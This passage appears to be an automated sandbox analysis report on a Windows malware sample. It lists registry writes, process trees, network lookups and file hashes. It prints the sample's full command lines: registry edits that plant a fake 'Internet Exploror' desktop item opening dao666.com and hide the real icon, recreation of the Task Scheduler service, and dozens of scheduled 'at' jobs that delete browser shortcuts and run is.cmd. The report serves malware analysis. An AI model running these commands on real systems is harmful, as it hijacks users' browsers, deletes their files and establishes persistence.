| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a85523d1bf50ddd4544c874c2cfed4f_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C start /min iexplore http://447.cc/index2.html?121xia
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://447.cc/index2.html?121xia
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\to.cmd
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2744 CREDAT:275457 /prefetch:2
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\copy.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C .\run.cmd
C:\Windows\SysWOW64\sc.exe
sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
C:\Windows\SysWOW64\sc.exe
sc config Schedule start= auto
C:\Windows\SysWOW64\net.exe
net start "Task Scheduler"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "Task Scheduler"
C:\Windows\SysWOW64\at.exe
at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
C:\Windows\SysWOW64\at.exe
at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
C:\Windows\SysWOW64\at.exe
at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
C:\Windows\SysWOW64\at.exe
at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd
C:\Windows\SysWOW64\at.exe
at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\桌面\*浏览*.*"
C:\Windows\SysWOW64\at.exe
at 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
C:\Windows\SysWOW64\at.exe
at 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 8.8.8.8:53 | 447.cc | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\121xia.vbs
| MD5 | 7e46083fb1779c4baf8efe26e6bfbed4 |
| SHA1 | 07155bb6e06e4ddb125a7afd50b5ee67c5c2e1a2 |
| SHA256 | d2b0505bb8eafd88c99de4643d40c9aa5a5a0428a0a30d291fa29657974fadb9 |
| SHA512 | c594c621e954a3b76d9d77a25f4dbd563bacf31450e5afd1ba577f147a4ea6e591c4ba361c0c3c89623a06d6facfb4dd9e1633efff8a41871f21734251a2ffc0 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\to.cmd
| MD5 | 93283cb2cbb91dc2553d3ccc53c24787 |
| SHA1 | 271054a80b7332910d4f746ccbabd6b9d85915fe |
| SHA256 | 31d5b5b80fc2c292ae1d3d94e6c35b5272e8ad0e9b06aa086eb61d6238d66beb |
| SHA512 | 6b485717301db3a10fde12b378de7e79a018e5e33eef9808c1a414a2b5ba983cc4b32a1bbfa5cd4005085c648381f663eb15c35f1e06c5b3e58bbc6fc6e5b70f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | e9453c56277dd24802b553677d0620fc |
| SHA1 | 8b27914191feae8061dd9577d473a638173b92a7 |
| SHA256 | 46493b2ba1dbf1f0b360d276423c0e7b7f99cdbe7f23a623d63ce8f20f82ea2d |
| SHA512 | c55a87c18ab67756556943c480385d6a42bb0904b090885b93c151f4661a132c9eb67a9838876af6217636a313a3a817629c2a0fe2a43313fddf1978191d8e41 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 5e1ac5999e539cafa3a303e8386cfbf9 |
| SHA1 | dcd5ce7b101636bb35b3c38ea4456f20b5fb142a |
| SHA256 | d9a95138ba749e2c04355d7b9354d90a45941d20fb120af3d2969779d90748d6 |
| SHA512 | f18fe45f0731f4deec3fde3ff19fe1b3d586db3e75e748224adfa0b0ea4b1fabab6b7dfbed3a127cadf2ea9ee6a5a0f9191b50055df39e64a5cce90da50a43a1 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 22ba26c787caf9c226a57ab934efe3a7 |
| SHA1 | 41da9b24a7e138eadf7fe359a9832bab35a22098 |
| SHA256 | 506c7c101ef39fb59bcef1a4952f0303f979daf01ffe4048e12458ad3cc0181d |
| SHA512 | 75609142b2e50fee2136f27c0dd124b3714f052579ab667fbfaf6f167bd1057b967f34d05293bf4b316b8580a3f63a8903fa147c83821087a4102a66ffb4e941 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1d903a49275ecf0360a005a210710ae1 |
| SHA1 | 53d92ee4cf725fd774fde7d8715dc57f05b4ad5e |
| SHA256 | 5228e97bfb7487be8921377a47ee94aa14ab9fb5208d719fc92cf81350949c6e |
| SHA512 | 0411ec8b3cf03f3587fb9a47b7e587d879fcdfbc6a56e2637a6e5400f4a4fd49c52adc0012c66bde052ed5b5bf96b53340b361cd99c8c2b3a4087d7147362ff4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.cmd
| MD5 | b47fb6ca5604063bb4e0af862ee3be9c |
| SHA1 | ebe74903212c246c83d826fa9ce7789141772b30 |
| SHA256 | fd34806658512394d2f4b9185d32590717b7f2169caad83bea0d93b3564b3044 |
